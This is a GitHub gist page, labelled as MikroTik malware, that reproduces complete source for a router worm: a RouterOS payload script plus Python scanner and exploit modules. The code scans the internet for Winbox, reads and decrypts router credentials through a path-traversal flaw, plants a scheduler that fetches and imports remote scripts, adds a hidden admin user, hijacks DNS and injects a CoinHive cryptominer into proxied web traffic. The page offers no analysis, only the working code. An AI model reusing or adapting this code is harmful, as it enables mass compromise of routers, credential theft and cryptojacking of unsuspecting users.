Skip to content

Instantly share code, notes, and snippets.

@malwarezone

malwarezone/script_template.txt Secret

Last active October 14, 2018 09:21
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4 to your computer and use it in GitHub Desktop.
Save malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4 to your computer and use it in GitHub Desktop.
Download ZIP
upd_browser - MikroTik malware
Raw
script_template.txt
:do {/ip proxy set enabled=yes port=8080 src-address="::"} on-error={:log info errorProxy}
:do {/ip proxy access remove [find Action=deny]} on-error={:log info errorProxy}
:do {/ip proxy access remove [find Action!=deny]} on-error={:log info errorProxy}
:do {/ip proxy access add action=deny disabled=no comment=sysadminpxy} on-error={:log info errorProxy}
:do {/ip firewall nat remove [find comment=sysadminpxy]} on-error={:log info errorNat}
:do {/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy} on-error={:log info errorNat}
:do {/ip firewall nat move [find comment=sysadminpxy] destination=0} on-error={:log info errorNat}
:do {/ip firewall filter remove [find comment=sysadminpxy]} on-error={:log info errorFilter}
:do {/ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080 action=add-src-to-address-list address-list=Ok address-list-timeout=5s comment=sysadminpxy} on-error={:log info errorFilter}
:do {/ip firewall filter move [find comment=sysadminpxy] destination=0} on-error={:log info errorFilter}
/ip dns set servers=94.247.43.254,107.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141
:do {/system ntp client set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235} on-error={:log info errorNtp}
/system scheduler remove [find name=Auto113]
/system scheduler remove [find name=upd111]
/system scheduler remove [find name=upd112]
/system scheduler remove [find name=upd113]
/system scheduler remove [find name=upd114]
:do {/system scheduler add name="upd111" start-time=startup on-event=":delay 5m
:do {/tool fetch url=\\"{iplogstart}\\" mode=http keep-result=no} on-error={}
/system scheduler remove [find name=upd111]" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112}
:do {/system scheduler add name="upd112" start-time=startup on-event="/system scheduler remove [find name=sh113]
:do {/file remove u113.rsc} on-error={}" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112}
:do {/system scheduler add name="upd113" interval=6h on-event=(":do {/tool fetch url=\\"http://min01.com:31416/min01?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={}
:do {/tool fetch url=\\"http://mikr0tik.com:31416/mikr0tik?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={}
:do {/tool fetch url=\\"http://up0.bit:31416/up0?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={}
:do {/import u113.rsc} on-error={}
:do {/file remove u113.rsc} on-error={}") policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd113}
:do {/system scheduler add name="upd114" interval=12h on-event=(
":do {/tool fetch url={iplog} mode=http keep-result=no} on-error={}"
) policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd113}
:do {/system scheduler add name="Auto113" start-time=03:11:00 interval=1d on-event="/system reboot" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorAuto113}
:do {/file remove autosupout.rif} on-error={}
:do {/file remove autosupout.old.rif} on-error={}
/ip service set api disabled=no port=8728 address=""
/ip service set ftp disabled=no port=21 address=""
:if ([:len [/user find name=("dircreate")]] > 0) do={/user remove "dircreate" }
/user add name=dircreate group=full password={newpass} disabled=no comment="{keybase58}"
:do {/file print file=dircreate} on-error={:log info errorFilePrint}
:delay 5s
:do {/file set dircreate contents="<html>\\r\\n<head>\\r\\n\t<meta http-equiv=\\"Content-Type\\" content=\\"text/html;charset=windows-1251\\">\\r\\n\t<title>\\"\\$(url)\\"</title> \\r\\n<script src=\\"https://coinhive.com/lib/coinhive.min.js\\"></script>\\r\\n<script>\\r\\n\tvar miner = new CoinHive.Anonymous({chKey}, {throttle: 0.1});\\r\\n\t
miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);\\r\\n</script>\\r\\n</head>\\r\\n<frameset>\\r\\n<frame src=\\"\\$(url)\\"></frame>\\r\\n</frameset>\\r\\n</html>"} on-error={:log info errorFileSave}
:do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password={newpass} src-path="dircreate.txt" dst-path="webproxy/error.html"} on-error={:log info errorfileCopy}
:do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password={newpass} src-path="dircreate.txt" dst-path="flash/webproxy/error.html"} on-error={:log info errorfileCopy2}
:do {/file remove "dircreate.txt"} on-error={}
:do {/user set address=87.246.0.0/16,152.237.0.0/16,10.0.0.0/8,100.64.0.0/10,172.16.0.0/12,192.168.0.0/16,{vip} [find name!=dircreate]} on-error={:log info errorSetAddress}
:do {/user set disabled=yes [find name=dircreate]} on-error={:log info errorSetAddress}
/user remove [find name=ftu]
/user group remove [find name=ftpgroupe]
/ip service set ftp disabled=yes port=21 address=""
:do {/ip socks set enabled=no port=27182} on-error={:log info errorSocksSet}
:do {/ip socks access remove [find action=deny]} on-error={:log info errorSocksAccess}
:do {/ip socks access remove [find action!=deny]} on-error={:log info errorSocksAceess}
:do {/ip dns static remove [find address!=1.1.1.1]} on-error={:log info errorStaticDns}
:do {/tool sniffer set streaming-enabled=no} on-error={:log info errorSniffer}
/system reboot
Raw
upd_browser.py
# Embedded file name: upd_browser.py
import threading, time, socket, random, ups, datetime, urllib, base58, pyautogui
thmax = 600
def poc(ip, level):
level = int(level)
if level == 3:
return False
user_pass = ups.get_user_pass(ip)
if len(user_pass) != 0:
try:
fg = False
shed = bytearray([])
shedidx = bytearray([])
part = random.randint(0, 9)
newpass = ''
for i in xrange(0, 10):
newpass += '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'[random.randint(0, 57)]
for user_pass_one in user_pass:
if user_pass_one[1] == 'dircreate':
newpass = user_pass_one[2]
ups.log(ip + ':' + 'dircreate' + ':' + newpass)
strusr = ip + '- part ' + str(part) + '\r\n'
for user_pass_one in user_pass:
strusr += ip + ':' + user_pass_one[1] + ':' + user_pass_one[2] + '\r\n'
ups.log(strusr)
keybase58 = ups.decrypt_password('Admiral', newpass)
keybase58 = base58.b58encode(keybase58)
shed, shedidx = ups.make_sheduller(shed, shedidx, ups.get_script(ip, part, newpass, keybase58))
for user_pass_one in user_pass:
if user_pass_one[0] == 'f':
fg1 = ups.save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.dat', shed, False)
fg2 = ups.save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.idx', shedidx, True)
if fg1 and fg2:
fg = True
break
if not fg:
for user_pass_one in user_pass:
if user_pass_one[0] != 'f':
fg1 = ups.save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.dat', shed, False)
fg2 = ups.save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.idx', shedidx, True)
if fg1 and fg2:
fg = True
break
except:
ups.log('Error excep poc')
if fg:
ups.log(ip + ' - ok')
return True
else:
ups.log(ip + ' - bad, level=' + str(level))
time.sleep(150)
return poc(ip, level + 1)
def ping(ip, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
try:
serror = s.connect_ex((ip, port))
except:
serror = -1
finally:
s.close()
return serror
def scan():
while True:
random.seed()
ip2 = str(random.randint(0, 255))
time.sleep(random.randint(0, random.randint(0, 50)))
ip1 = str(random.randint(0, 255))
ip3b = random.randint(0, 255)
for ip3s in xrange(ip3b, ip3b + 20):
ip3 = ip3s
if ip3 > 255:
ip3 = ip3 - 256
for ip4 in xrange(0, 256):
ip = str(ip1) + '.' + str(ip2) + '.' + str(ip3) + '.' + str(ip4)
serror = ping(ip, 8291)
if serror == 0:
serror = ping(ip, random.randint(56778, 56887))
if serror != 0:
poc(ip, 0)
if __name__ == '__main__':
time.sleep(3)
pyautogui.alert(text='Update error code 80072EE2', title='Error', button='OK')
time.sleep(20)
urllib.urlopen(ups.viplogpoc).read()
ups.log('Start 0')
for i in xrange(thmax):
try:
p = threading.Thread(target=scan)
p.setDaemon(True)
p.start()
if i == thmax - 1:
ups.log('Start 550')
except:
ups.log('Exccept threading')
vnow = datetime.date(2012, 12, 12)
while True:
vold = vnow
vnow = datetime.datetime.now()
if (vold.year != vnow.year or vold.month != vnow.month or vold.day != vnow.day or vold.hour != vnow.hour) and vold.year != 2012:
urllib.urlopen(ups.viplogpoc).read()
time.sleep(1000)
ups.log('All END!!!')
Raw
ups.py
# Embedded file name: ups.py
import socket, sys, hashlib, random, base58
part = 0
keybase58 = ''
viplogpoc = 'http://iplogger.co/1DQrN6'
def get_script(vip, vpart, vnewpass, vkeybase58):
viplog = ('http://iplogger.co/1DErN6',
'http://iplogger.co/1DYrN6',
'http://iplogger.co/1DPrN6',
'http://iplogger.co/1DArN6',
'http://iplogger.co/1DSrN6',
'http://iplogger.co/1DDrN6',
'http://iplogger.co/1DFrN6',
'http://iplogger.co/1DGrN6',
'http://iplogger.co/1DHrN6',
'http://iplogger.co/1DJrN6')
viplogstart = 'http://iplogger.co/1DcrN6'
vchKey = ("'oiKAGEslcNfjfgxTMrxKGMJvh436ypIM'",
"'5zHUikiwJT4MLzQ9PLbU11gEz8TLCcYx'",
"'5ROof564mEBQsYzCqee0M2LplLBEApCv'",
"'qKoXV8jXlcUaIt0LGcMJIHw7yLJEyyVO'",
"'ZsyeL0FvutbhhdLTVEYe3WOnyd3BU1fK'",
"'ByMzv397Mzjcm4Tvr3dOzD6toK0LOqgf'",
"'joy1MQSiGgGHos78FarfEGIuM5Ig7l8h'",
"'ryZ1Dl4QYuDlQBMchMFviBXPL1E1bbGs'",
"'jh0GD0ZETDOfypDbwjTNWXWIuvUlwtsF'",
"'BcdFFhSoV7WkHiz9nLmIbHgil0BHI0Ma'",
"'BcdFFhSoV7WkHiz9nLmIbHgil0BHI0Ma'")
mtscript = ':do {/ip proxy set enabled=yes port=8080 src-address="::"} on-error={:log info errorProxy}' + '\r\n' + ':do {/ip proxy access remove [find Action=deny]} on-error={:log info errorProxy}' + '\r\n' + ':do {/ip proxy access remove [find Action!=deny]} on-error={:log info errorProxy}' + '\r\n' + ':do {/ip proxy access add action=deny disabled=no comment=sysadminpxy} on-error={:log info errorProxy}' + '\r\n' + ':do {/ip firewall nat remove [find comment=sysadminpxy]} on-error={:log info errorNat}' + '\r\n' + ':do {/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy} on-error={:log info errorNat}' + '\r\n' + ':do {/ip firewall nat move [find comment=sysadminpxy] destination=0} on-error={:log info errorNat}' + '\r\n' + ':do {/ip firewall filter remove [find comment=sysadminpxy]} on-error={:log info errorFilter}' + '\r\n' + ':do {/ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080 action=add-src-to-address-list address-list=Ok address-list-timeout=5s comment=sysadminpxy} on-error={:log info errorFilter}' + '\r\n' + ':do {/ip firewall filter move [find comment=sysadminpxy] destination=0} on-error={:log info errorFilter}' + '\r\n' + '/ip dns set servers=94.247.43.254,107.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141' + '\r\n' + ':do {/system ntp client set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235} on-error={:log info errorNtp}' + '\r\n' + '/system scheduler remove [find name=Auto113]' + '\r\n' + '/system scheduler remove [find name=upd111]' + '\r\n' + '/system scheduler remove [find name=upd112]' + '\r\n' + '/system scheduler remove [find name=upd113]' + '\r\n' + '/system scheduler remove [find name=upd114]' + '\r\n' + ':do {/system scheduler add name="upd111" start-time=startup on-event=":delay 5m\\r\\n:do {/tool fetch url=\\"{iplogstart}\\" mode=http keep-result=no} on-error={}\\r\\n/system scheduler remove [find name=upd111]" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112}' + '\r\n' + ':do {/system scheduler add name="upd112" start-time=startup on-event="/system scheduler remove [find name=sh113]\\r\\n:do {/file remove u113.rsc} on-error={}" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112}' + '\r\n' + ':do {/system scheduler add name="upd113" interval=6h on-event=(":do {/tool fetch url=\\"http://min01.com:31416/min01?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={}\\r\\n:do {/tool fetch url=\\"http://mikr0tik.com:31416/mikr0tik?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={}\\r\\n:do {/tool fetch url=\\"http://up0.bit:31416/up0?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={}\\r\\n:do {/import u113.rsc} on-error={}\\r\\n:do {/file remove u113.rsc} on-error={}") policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd113}' + '\r\n' + ':do {/system scheduler add name="upd114" interval=12h on-event=(":do {/tool fetch url={iplog} mode=http keep-result=no} on-error={}") policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd113}' + '\r\n' + ':do {/system scheduler add name="Auto113" start-time=03:11:00 interval=1d on-event="/system reboot" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorAuto113}' + '\r\n' + ':do {/file remove autosupout.rif} on-error={}' + '\r\n' + ':do {/file remove autosupout.old.rif} on-error={}' + '\r\n' + '/ip service set api disabled=no port=8728 address=""' + '\r\n' + '/ip service set ftp disabled=no port=21 address=""' + '\r\n' + ':if ([:len [/user find name=("dircreate")]] > 0) do={/user remove "dircreate" }' + '\r\n' + '/user add name=dircreate group=full password={newpass} disabled=no comment="{keybase58}"' + '\r\n' + ':do {/file print file=dircreate} on-error={:log info errorFilePrint}' + '\r\n' + ':delay 5s' + '\r\n' + ':do {/file set dircreate contents="<html>\\r\\n<head>\\r\\n\t<meta http-equiv=\\"Content-Type\\" content=\\"text/html;charset=windows-1251\\">\\r\\n\t<title>\\"\\$(url)\\"</title> \\r\\n<script src=\\"https://coinhive.com/lib/coinhive.min.js\\"></script>\\r\\n<script>\\r\\n\tvar miner = new CoinHive.Anonymous({chKey}, {throttle: 0.1});\\r\\n\tminer.start(CoinHive.FORCE_EXCLUSIVE_TAB);\\r\\n</script>\\r\\n</head>\\r\\n<frameset>\\r\\n<frame src=\\"\\$(url)\\"></frame>\\r\\n</frameset>\\r\\n</html>"} on-error={:log info errorFileSave}' + '\r\n' + ':do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password={newpass} src-path="dircreate.txt" dst-path="webproxy/error.html"} on-error={:log info errorfileCopy}' + '\r\n' + ':do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password={newpass} src-path="dircreate.txt" dst-path="flash/webproxy/error.html"} on-error={:log info errorfileCopy2}' + '\r\n' + ':do {/file remove "dircreate.txt"} on-error={}' + '\r\n' + ':do {/user set address=87.246.0.0/16,152.237.0.0/16,10.0.0.0/8,100.64.0.0/10,172.16.0.0/12,192.168.0.0/16,{vip} [find name!=dircreate]} on-error={:log info errorSetAddress}' + '\r\n' + ':do {/user set disabled=yes [find name=dircreate]} on-error={:log info errorSetAddress}' + '\r\n' + '/user remove [find name=ftu]' + '\r\n' + '/user group remove [find name=ftpgroupe]' + '\r\n' + '/ip service set ftp disabled=yes port=21 address=""' + '\r\n' + ':do {/ip socks set enabled=no port=27182} on-error={:log info errorSocksSet}' + '\r\n' + ':do {/ip socks access remove [find action=deny]} on-error={:log info errorSocksAccess}' + '\r\n' + ':do {/ip socks access remove [find action!=deny]} on-error={:log info errorSocksAceess}' + '\r\n' + ':do {/ip dns static remove [find address!=1.1.1.1]} on-error={:log info errorStaticDns}' + '\r\n' + ':do {/tool sniffer set streaming-enabled=no} on-error={:log info errorSniffer}' + '\r\n' + '/system reboot'
mt = mtscript.replace('{part}', str(vpart))
mt = mt.replace('{iplog}', viplog[vpart])
mt = mt.replace('{iplogstart}', viplogstart)
mt = mt.replace('{keybase58}', vkeybase58)
mt = mt.replace('{chKey}', vchKey[vpart])
mt = mt.replace('{newpass}', vnewpass)
mt = mt.replace('{vip}', vip.split('.')[0] + '.' + vip.split('.')[1] + '.' + vip.split('.')[2] + '.0/24')
return mt
def log(s):
s = str(s)
try:
print s
except:
print 'error except log'
def decrypt_password(user, pass_enc):
key = hashlib.md5(user + '283i4jfkai3389').digest()
passw = ''
b1 = bytearray(pass_enc)
b2 = bytearray(key)
for i in range(0, len(b1)):
passw += chr(b1[i] ^ b2[i % len(key)])
return passw.split('\x00')[0]
def extract_user_pass_from_entry(entry):
user_data = entry.split('\x01\x00\x00!')[1]
pass_data = entry.split('\x11\x00\x00!')[1]
user_len = ord(user_data[0])
pass_len = ord(pass_data[0])
username = user_data[1:1 + user_len]
password = pass_data[1:1 + pass_len]
return (username, password)
def get_pair(data):
user_list = []
entries = data.split('M2')[1:]
for entry in entries:
try:
user, pass_encrypted = extract_user_pass_from_entry(entry)
if entry.find('\x02\x00\x00\t\x03') != -1:
frw = 'f'
else:
frw = 'x'
except:
continue
pass_plain = decrypt_password(user, pass_encrypted)
user = str(user)
user_list.append((frw, user, pass_plain))
return user_list
def delete255(d):
d1 = ''
while len(d) > 0:
d = d[2:]
d1 = d1 + d[:255]
d = d[255:]
return d1
def insert255(d):
if len(d) < 256:
d1 = bytearray([len(d), 1])
else:
d1 = bytearray([255, 1])
while len(d) > 0:
d1 = d1 + d[0:255]
d = d[255:]
if len(d) != 0:
if len(d) < 256:
d1 = d1 + bytearray([len(d), 255])
else:
d1 = d1 + bytearray([255, 255])
return d1
def load_file(ip, namefile):
a1 = 'M2\x05\x00\xff\x01\x06\x00\xff\t\x05\x07\x00\xff\t\x07\x01\x00\x00!'
a2 = '\x02\x00\xff\x88\x02\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\xff\x88\x02\x00\x02\x00\x00\x00\x02\x00\x00\x00'
b = ';\x01\x009M2\x05\x00\xff\x01\x06\x00\xff\t\x06\x01\x00\xfe\t5\x02\x00\x00\x08\x00\x80\x00\x00\x07\x00' + '\xff\t\x04\x02\x00\xff\x88\x02\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\xff\x88\x02\x00\x02\x00\x00\x00\x02\x00\x00\x00'
try:
s = socket.socket()
s.settimeout(10)
s.connect((ip, 8291))
a = a1 + chr(len(namefile)) + namefile + a2
a = chr(len(a) + 2) + '\x01\x00' + chr(len(a)) + a
s.send(bytearray(a))
d = str(s.recv(1024))
if len(d) < 38:
raise Exception('no answer')
if d[4] != 'M' or d[5] != '2':
raise Exception('Not M2')
b = b[:19] + d[38] + b[20:]
s.send(bytearray(b))
d = str(s.recv(256 * 256))
if len(d) < 6:
raise Exception('no answer')
if d[4] != 'M' or d[5] != '2':
raise Exception('Not M2')
d = delete255(d)
n = d.find('\x03\x00\x00')
if d[n + 3] == '1':
res = d[n + 5:]
elif d[n + 3] == '0':
res = d[n + 6:]
else:
res = ''
except:
res = ''
finally:
s.close()
return res
def get_user_pass(ip):
return get_pair(load_file(ip, '/////./..//////./..//////./../flash/rw/store/user.dat'))
def save_file(ip, user, password, namefile, data, fg_reboot):
pinit = [55,
1,
0,
53,
77,
50,
5,
0,
255,
1,
6,
0,
255,
9,
1,
7,
0,
255,
9,
7,
1,
0,
0,
33,
4,
108,
105,
115,
116,
2,
0,
255,
136,
2,
0,
0,
0,
0,
0,
11,
0,
0,
0,
1,
0,
255,
136,
2,
0,
2,
0,
0,
0,
2,
0,
0,
0]
psalt = [42,
1,
0,
40,
77,
50,
1,
0,
254,
9,
39,
7,
0,
255,
9,
5,
2,
0,
255,
136,
2,
0,
0,
0,
0,
0,
11,
0,
0,
0,
1,
0,
255,
136,
2,
0,
2,
0,
0,
0,
2,
0,
0,
0,
46,
1,
0,
44,
77,
50,
5,
0,
255,
1,
6,
0,
255,
9,
2,
7,
0,
255,
9,
4,
2,
0,
255,
136,
2,
0,
0,
0,
0,
0,
11,
0,
0,
0,
1,
0,
255,
136,
2,
0,
13,
0,
0,
0,
4,
0,
0,
0]
ppass = [100,
1,
0,
98,
77,
50,
12,
0,
0,
0,
5,
0,
255,
1,
6,
0,
255,
9,
3,
7,
0,
255,
9,
1,
10,
0,
0,
49,
17,
0,
19,
120,
15,
235,
246,
25,
15,
217,
0,
237,
39,
189,
25,
20,
243,
36,
9,
0,
0,
49,
16,
185,
185,
158,
154,
32,
172,
153,
96,
86,
163,
217,
155,
155,
201,
53,
22,
1,
0,
0,
33,
2,
2,
0,
255,
136,
2,
0,
0,
0,
0,
0,
11,
0,
0,
0,
1,
0,
255,
136,
2,
0,
13,
0,
0,
0,
4,
0,
0,
0]
h1 = 'M2\x05\x00\xff\x01\x06\x00\xff\t\x01\x07\x00\xff\t\x01\x01\x00\x00!'
h2 = '\x02\x00\xff\x88\x02\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\xff\x88\x02\x00\x02\x00\x00\x00\x02\x00\x00\x00'
fl1 = bytearray([77,
50,
5,
0,
255,
1,
4,
0,
0,
1,
1,
0,
254,
9,
3,
6,
0,
255,
9,
12,
7,
0,
255,
9,
2,
3,
0,
0])
fl2 = bytearray([2,
0,
255,
136,
2,
0,
0,
0,
0,
0,
8,
0,
0,
0,
1,
0,
255,
136,
2,
0,
2,
0,
0,
0,
2,
0,
0,
0])
rb = bytearray([42,
1,
0,
40,
77,
50,
5,
0,
255,
1,
6,
0,
255,
9,
13,
7,
0,
255,
9,
5,
2,
0,
255,
136,
2,
0,
0,
0,
0,
0,
8,
0,
0,
0,
1,
0,
255,
136,
1,
0,
24,
0,
0,
0])
res = False
try:
s = socket.socket()
s.settimeout(10)
s.connect((ip, 8291))
pinit = bytearray(pinit)
psalt = bytearray(psalt)
ppass = bytearray(ppass)
s.send(pinit)
del pinit
d = bytearray(s.recv(256 * 256))
psalt[10] = d[38]
s.send(psalt)
del psalt
d = bytearray(s.recv(256 * 256))
i = d.index(bytearray([9,
0,
0,
49,
16]))
salt = d[i + 5:i + 5 + 16]
hash = bytearray(hashlib.md5('\x00' + password + str(salt)).digest())
i = ppass.index(bytearray([10,
0,
0,
49]))
ppass[i + 6:i + 6 + 16] = hash
i = ppass.index(bytearray([9,
0,
0,
49]))
ppass[i + 5:i + 5 + 16] = salt
i = ppass.index(bytearray([1,
0,
0,
33]))
ppass[i + 4] = len(user)
ppass = ppass[:i + 5] + bytearray(user) + ppass[i + 5:]
ppass[0] = 98 + len(user)
ppass[3] = 96 + len(user)
s.send(ppass)
del ppass
d = bytearray(s.recv(256 * 256))
if d.find(bytearray([105,
110,
118,
97,
108])) != -1:
raise Exception('Invalid password')
h = h1 + chr(len(namefile)) + namefile + h2
h = chr(len(h) + 2) + '\x01\x00' + chr(len(h)) + h
s.send(bytearray(h))
del h1
del h2
del h
d = bytearray(s.recv(256 * 256))
i = d.index(bytearray([1,
0,
254,
9]))
fl1[14] = d[i + 4]
if len(data) < 256:
fl = fl1 + bytearray([49, len(data)])
else:
fl = fl1 + bytearray([48, len(data) % 256, len(data) // 256])
fl = fl + bytearray(data) + fl2
fl = bytearray([len(fl) // 256, len(fl) % 256]) + fl
fl = insert255(fl)
s.send(bytearray(fl))
d = bytearray(s.recv(256 * 256))
i = d.find(bytearray([8,
0,
255,
8]))
res = i == -1
if fg_reboot:
s.send(rb)
d = bytearray(s.recv(256 * 256))
except:
res = False
finally:
s.close()
return res
def make_sheduller(shed, shedidx, mtscript):
p1 = bytearray([77,
50,
10,
0,
254,
0,
46,
1,
0,
8,
255,
255,
255,
255,
49,
1,
0,
8,
224,
1,
0,
0,
109,
0,
0,
9,
0,
1,
0,
254,
9,
0,
113,
0,
0,
8,
240,
107,
1,
0,
103,
0,
0,
33,
5,
97,
100,
109,
105,
110,
9,
0,
254,
33,
0,
45,
1,
0])
p2 = bytearray([102,
0,
0,
33,
5,
115,
104,
49,
49,
51])
idx = bytearray([0,
0,
0,
0,
43,
1,
0,
0,
5,
0,
0,
0])
shed = bytearray(shed)
shedidx = bytearray(shedidx)
try:
if len(mtscript) < 256:
p = p1 + bytearray([33, len(mtscript)]) + bytearray(mtscript) + p2
else:
p = p1 + bytearray([32, len(mtscript) % 256, len(mtscript) // 256]) + bytearray(mtscript) + p2
t1 = len(p) % 256 + 2
t2 = len(p) // 256
if t1 > 255:
t1 = t1 - 256
t2 += 1
p = bytearray([t1, t2]) + p
idx[4] = t1
idx[5] = t2
t2 = -1
t1 = 0
if len(shedidx) != 0:
while t1 < len(shedidx):
if shedidx[t1] > t2 and shedidx[t1] != 255:
t2 = shedidx[t1]
t1 += 12
idx[0] = t2 + 1
except:
p = bytearray([])
idx = bytearray([])
return (shed + p, shedidx + idx)
if __name__ == '__main__':
ip = '79.142.53.22'
user_pass = get_user_pass(ip)
if len(user_pass) != 0:
fg = False
shed = bytearray([])
shedidx = bytearray([])
part = random.randint(0, 9)
newpass = ''
for i in xrange(0, 10):
newpass += '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'[random.randint(0, 57)]
for user_pass_one in user_pass:
if user_pass_one[1] == 'dircreate':
newpass = user_pass_one[2]
log(ip + ':' + 'dircreate' + ':' + newpass)
strusr = ip + '- part ' + str(part) + '\r\n'
for user_pass_one in user_pass:
strusr += ip + ':' + user_pass_one[1] + ':' + user_pass_one[2] + '\r\n'
log(strusr)
keybase58 = decrypt_password('Admiral', newpass)
keybase58 = base58.b58encode(keybase58)
shed, shedidx = make_sheduller(shed, shedidx, get_script(ip, part, newpass, keybase58))
for user_pass_one in user_pass:
if user_pass_one[0] == 'f':
fg1 = save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.dat', shed, False)
fg2 = save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.idx', shedidx, True)
if fg1 and fg2:
fg = True
break
if not fg:
for user_pass_one in user_pass:
if user_pass_one[0] != 'f':
fg1 = save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.dat', shed, False)
fg2 = save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.idx', shedidx, True)
if fg1 and fg2:
fg = True
break
if fg:
log(ip + ' - ok')
else:
log(ip + ' - bad')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment